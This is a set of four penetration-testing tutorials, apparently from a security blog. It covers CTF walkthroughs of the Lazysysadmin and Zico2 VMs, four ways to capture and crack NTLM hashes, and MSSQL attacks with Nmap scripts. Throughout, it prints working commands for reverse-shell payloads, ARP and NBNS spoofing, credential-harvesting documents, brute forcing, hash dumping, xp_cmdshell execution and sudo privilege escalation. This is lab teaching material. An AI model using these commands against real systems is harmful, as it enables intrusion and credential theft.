Hack the Lazysysadmin VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as Lazysysadmin. The credit for making this vm machine goes to “Togie Mcdogie” and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.124 but you will have to find your own)

netdiscover

Use nmap for port enumeration.

nmap -sV 192.168.1.124

We find port 139 and port 445 is open, so we use smbclient to look for shared disk.

Smbclient -L 192.168.1.124

After finding the shared drive we use smbclient to access the shared folder.

smbclient \\192.168.1.124\share$

Searching through the files we find wordpress folder. In the wordpress folder, we download the wp-config.php file to find the password and username.

In the wp-config.php file we find the username and password for wordpress login.

Now we use dirb to find the wordpress page, as the default page on the server is not based on wordpress.

dirb http://192.168.1.124

Now after finding the wordpress page we open admin login page. We access the admin dashboard using the username and password we found earlier in the wp-config.php file.

We then create a php payload using msfvenom and replace the 404.php page in themes with the code of our payload.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.109 lport=4444 -f raw

We set up our listener using metasploit.

msf > use exploit/multi/handler

msf exploit(handler) > set lhost 192.168.1.109

msf exploit(handler) > set lport 4444

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > run

We then call the 404.php page to start our session. The 404.php page can be found in /wp-content/themes/twentyfifteen/404.php

As soon as our payload is executed we get our reverse shell.

After searching through the files, we didn’t find anything. So we go back to the shared folder and in there we download a file called deets.txt

When we open the file we find password for some user.

We open the /etc/passwd file on the VM to find the name of the users.

When we switch users we are prompted by an error message to use terminal, so we spawn /bin/bash using python.

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

Then we switch user to togie and use the password we find in deets.txt file

su – togie

We then look into sudoers and find that we have all the privileges of root user so we switch to root.

sudo -l

sudo su

So we switch to root and go into root folder. There we find a file called proof.txt, we open the file and are greeted with a message congratulating for the completion of the CTF challenge.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

4 Ways to Capture NTLM Hashes in Network

Hello friends! Today we are describing how to capture NTLM Hash in a local network. In this article we had captured NTLM hash 4 times through various methods. Before we proceed towards attacking techniques, let’s read the brief introduction on NTLM Hash.

The acronym for word NTLM is made by combining following terms:

NT: New technologies (Windows)

LAN: Local area network

M: Manager

In a Windows network, NT LAN Manager (NTLM) is a suite of Microsoft security protocols. It was the default for network authentication in the Windows NT 4.0 operating system that provides authentication, integrity, and confidentiality to users. The NTLMv2 is the latest version and uses the NT MD4 based one way function. The hash lengths are 128 bits and work for local account and Domain account.

The NTLM protocol uses one or both of two hashed password values, both of which are also stored on the server (or domain controller), and which through a lack of salting are password equivalent, meaning that if you grab the hash value from the server, you can authenticate without knowing the actual password.

For more information visit Wikipedia.org

Let’s Begin!!

Requirement

Attacker: Kali Linux

Target: Windows 10

Capture NTLMv2 hash through Sniffing  

Being as attacker open etter.dns file from inside /etc/ettercap  in your Kali Linux system then replace whole text by editing given below line includes attacker’s IP and save the text document.

* A 192.168.1.103

Now follow the given bellow step to run ettercap to start sniffing.

  • Application > sniffing and spoofing > ettercap
  • Click on sniff and Select your network interface.
  • Scan for host to generate target list.

Select the host and add to target, from given image you read among 5 hosts I had chose 192.168.1.101 as target and add to target 1.

Click on MITM from menu bar to select ARP Poisoning, a dialog box will pop-up now enable “sniff remote connects” and click ok.

After then click on plugins option from menu bar and choose dns_spoof

By making use of dns_spoof attacker can redirect victim’s network traffic on his network IP, so that whatever victim will open on his web browser will get redirect on attacker’s IP.

Now load metasploit framework and execute following code to make use of http_ntlm module.

This module attempts to quietly catch NTLM/LM Challenge hashes.

use auxiliary/server/capture/http_ntlm

msf auxiliary(http_ntlm) > set srvhost 192.168.1.103

msf auxiliary(http_ntlm) > set SRVPORT 80

msf auxiliary(http_ntlm) > set URIPATH /

msf auxiliary(http_ntlm) > set JOHNPWFILE /root/Desktop/

msf auxiliary(http_ntlm) > exploit

Now according to above trap set for victim this module will capture NTLM password of victim’s system when he will open any http web site on his browser which will redirect that web site on attacker’s IP.

From given below image you can notice victim is trying to browse “hackingarticles.in” on his web browser but it requires authentication which is requesting for his username and password. Now if he try to open something else let says google.com there also it will ask username and password for authentication, until the victim will not submit his username and password he cannot browse anything on his web browser.

As the victim enter username and password, attacker at background will capture NTLM hash on his system.

Great!! The attacker had captured NTMLv2 hash, now let count detail apart from hash value that the attacker has captured.

From given image you can see that attacker has captured two things more:

Username: pentest

Machine name: Desktop-UKIQM20

Now use john the ripper to crack the ntlmv2 hash by executing given below command

john _netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.

Capture NTLMv2 hash through capture SMB & spoof NBNS

This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. Responses sent by this service have by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtcrack or John the ripper (with jumbo patch). To exploit this, the target system must try to authenticate to this module.

use auxiliary/server/capture/smb

msf auxiliary(smb) > set srvhost 192.168.1.103

msf auxiliary(smb) > set JOHNPWFILE /tmp/john_smb

msf auxiliary(smb) > exploit

Simultaneously run NBNS_response module under capture smb module.

This module forges NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests sent to the local subnet’s broadcast address and spoof a response, redirecting the querying machine to an IP of the attacker’s choosing. Combined with auxiliary/server/capture/smb or auxiliary/server/capture/http_ntlm it is a highly effective means of collecting crackable hashes on common networks. This module must be run as root and will bind to udp/137 on all interfaces.

use auxiliary/spoof/nbns/nbns_response

msf auxiliary(nbns_response) > set SPOOFIP 1192.168.1.103

msf auxiliary(nbns_response) > set INTERFACE eth0

msf auxiliary(nbns_response) >exploit

As result this module will generate a fake window security prompt on victim’s system to establish connection with another system in order to access share folders of that system.

We had use nmap UDP and TCP port scanning command for identifying open ports and protocol and from given image you can port 137 is open for NetBIOS network service.

Now victim will try to access share folder therefore he will try of connect with him (attacker) through his network IP, given below image is a proof to demonstrate that victim is connecting attacker’s IP: 192.168.1.103.

When victim will try to access share folder, he will get trap into fake window security alert prompt, which will ask victims to enter his username and password for accessing share folders.

Awesome!! Once again the attacker had captured NTMLv2 hash, from given image you can see that here also the attacker has captured two things more:

Username: pentest

Machine name: Desktop-UKIQM20

Again use john the ripper to crack the ntlmv2 hash by executing given below command

john _netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.

Capture NTLMv2 hash through capture SMB & word UNC injector

This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007, 2010, and 2013.

use auxiliary/docx/word_unc_injector

msf auxiliary(word_unc_injector) >set lhost 192.168.1.103

msf auxiliary(word_unc_injector) >exploit

It has created an empty docx file under given path /root/.msf4/local/

Now send this msf.docx file to victims and again run capture smb module in metasploit framework as done priviously.

From given below image you can observe that in order to get the hashes the auxiliary/server/capture/smb module has been used.

As the victim will open msf.docx file, again the attacker had captured NTMLv2 hash on his system. The only difference between above two attacks and in this attack is that here we had only captured NTLMv2 hash.

Again use john the ripper to crack the ntlmv2 hash by executing given below command

john _netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.

Responder

NBT-NS/LLMNR Responder Created by Laurent Gaffie which is an LLMNR, NBT-NS and MDNS poisoner with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server that can perform above all attacks. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix. By default, the tool will only answer to File Server Service request, which is for SMB.

This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587 and Multicast UDP 5553.

Now open the new terminal and type following command to download it from github:

git clone https://github.com/SpiderLabs/Responder.git

cd Responder

Once it gets downloaded execute following command to run the python script.

python Responder.py –I 192.168.1.103 -I eth0

From specified image you can perceive that all poisoners and server services gets ON.

Now again victim will try to access share folder therefore he will try of connect with him (attacker) through his network IP, given below image is a proof to display that victim is connecting attacker’s IP: 192.168.1.103.

When victim will try to access share folder, he will get trap into fake network error alert prompt, as shown in given below image.

Once again the attacker had successfully captured NTMLv2 hash, from given image you can see that here also the attacker has captured two things more:

Username: pentest

Machine name: Desktop-UKIQM20

It will store captured NTLM hash in a text document under given /root/Desktop/Responder/logs.

Again use john the ripper to crack the ntlmv2 hash by executing given below command

john _netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.

Wonderful! These were the four ways to trap the target user in order to capture NTLM hash.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

MSSQL Peneration Testing using Nmap

Hello friends! Today we are going to perform Microsoft SQL penetration testing using NMAP scripts in order to retrieve basic information such as database name, usernames, tables name and etc from inside SQL server running on Windows operating system. In our previous article we had setup Microsoft SQL server in Windows 10.

Requirement

Attacker: kali Linux (NMAP)

Target: Windows 10 (MS SQL Server)

Lets start!!

Scan port 1433

Open the terminal in kali linux and scan target IP for port 1433 using nmap command.

nmap -p 1433 192.168.1.104

From given below image you can observe that port 1433 is open for MS-SQL service.

Enumerating version information

Given below command will attempt to determine configuration and version information for Microsoft SQL Server instances.

nmap -p 1433 –script ms-sql-info 192.168.1.104

In specified below image you can observe the install version and details of MS-SQL server.

Brute Force Attacker

Given below command will attempt to determine username and password through brute force attack against MS-SQL by means of username and password dictionary.

nmap -p 1433 –script ms-sql-brute –script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.104

In specfied image you can observe that we had successfully retrieve credential for two users:

  • Username: ignite and password:12345
  • Username: sa and password:123

Execute MS-SQL Query

Once you have retrieved the login credential use these credential in NMAP script to execute MS –SQL query. Given below will try to execute certain query “sp_database” against Microsoft SQL server.

Specified query “sp_databases” is part of record Stored Procedures and dump a list of database names from an instance of the SQL Server.

nmap -p 1433 –script ms-sql-query –script-args mssql.username=sa,mssql.password=admin123,ms-sql-query.query=“sp_databases” 192.168.1.104

Hence as result it has dumped two database names “ignite & master” whereas master is the default database name of MS_SQL server.

Check Microsoft SQL server configuration

 Following command will attempt to describe Microsoft SQL server configuration setting by passing login credential as argument through nmap script.

nmap -p 1433 –script ms-sql-config –script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

Hence you can check configuration setting from given below image.

Obtain list of tables

Following command will attempt to fetch list of tables from inside Microsoft SQL server by passing login credential as argument through nmap script.

nmap -p 1433 –script ms-sql-tables –script-args mssql.username=sa,mssql.password=admin123

192.168.1.104

Hence you can check list of tables from given below image.

Enumerate NetBIOS information

Given below NMAP script will enumerate information from remote Microsoft SQL services with NTLM authentication enabled.

Sending a MS-TDS NTLM authentication request with an invalid domain and null credentials will cause the remote service to respond with a NTLMSSP message disclosing information to include NetBIOS, DNS, and OS build version.

 nmap -p 1433 –script ms-sql-ntlm-info 192.168.1.104

Hence from given below image you can read the NETBIOS information remote Microsoft SQL server.

Dump password hashes

Following command will dump the password hashes from an MS-SQL server in a format suitable for cracking by tools such as John-the-ripper. In order to do so the user needs to have the appropriate DB privileges.

nmap -p 1433 –script ms-sql-dump-hashes –script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

From given image you can observe that it has dumped the hash value of passwords of user: sa which we have enumerated above.

Identify database owner

Following command will execute a query against Microsoft SQL Server instances for a list of databases a user has access to. In order to do so the user needs to have the appropriate DB privileges. Therefore we have passes username and password as argument through NMAP script.

nmap -p 1433 –script ms-sql-hashdbaccess –script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

In specified image you can observe that it showing user sa is owner the database “ignite”.

Ms-SQL Allows XP_cmdshell option

The xp_cmdshell is a function of Microsoft SQL Server that allows system administrators to execute operating system command. By default, the xp_cmdshell option is disabled.

From given below image you can see we had enable the xp_cmdshell function by executing following statement inside master database.

EXEC sp_configure ‘xp_cmdshell’;

Now save above configuration setting through following statement:

 RECONFIGURE;

Exploit XP_cmdshell Function

Now following NMAP script will attempt to run a command using the command shell of Microsoft SQL Server if found xp_cmdshell is enabled in targeted server.

nmap -p 1433 –script ms-sql-xp-cmdshell –script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

From given image you can confirm that we have executed OS command: net user as retrieve user account.

Blank password lead to unauthorized access

If the admin of Microsoft-SQL Server left the password Blank for login then attacker can director login into database server, from  given below image you can see we are exploring the property of a user’s account “sa”.

Here kept “blank space” as password for user “sa”. As we know by default sa is admin of MS-SQL server and now its password is blank space therefore chances of making unauthorized access into server by attacker will get increases.

Make unauthorized access into SQL server

Following  NMAP script will try to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.

nmap -p 1433 –script ms-sql-empty 192.168.1.104

From given below image you can perceive we had made successfully login with user: sa and empty password.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

Hack the Zico2 VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as Zico2. The credit for making this vm machine goes to “Rafael” and it is another boot2root challenge, where we have to root the system to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.26 but you will have to find our own)

netdiscover

Use nmap for port enumeration.

nmap -sV 192.168.0.26

We find port 80 is open, so we open this ip in our browser.

Browsing through the site we find that, this site is vulnerable to LFI.

We couldn’t find anything special here so we use dirb to find directories.

dirb http://192.168.0.26/

We found an interesting link called dbadmin. We open it in our browser.

When we open this page we find another link; this link leads us to phpliteadmin login page.

We tried the password” admin”, and it granted us access.

We find that this version of phpliteadmin is vulnerable to php code injection.

So we create another database and named it shell.php we use this database to inject php code.

After we inject our code we use LFI to execute our shell. Here we can see that ls command was executed when we execute our shell.

Now we create executable file using msfvenom.

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.25 lport=4444 -f elf > /root/Desktop/shell

We move it to /var/www/html/ and then setup our listener on metasploit.

We then use php code injection to upload our file to the server make it executable, and execute the file.

We execute the php code using LFI and get a reverse shell.

After searching through the files we find password for user zico in /home/zico/worpress/wp-config.php

We use this password to login through ssh.

After searching through the files, we take loot at the sudoers and find that we are allowed to use a few commands as root.

Now we move to /tmp folder and find a few files that we had uploaded. We use zip to gain root privilege by executing shell command along with zip.

sudo -u root zip shell.zip shell.py -T -unzip-command=”sh -c /bin/bash

After gaining root privilege we move to root folder. Inside the root folder we find a file called flag.txt when we open the file. We get greeted by a message congratulating for the completion of the challenge.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

Related Posts Plugin for WordPress, Blogger...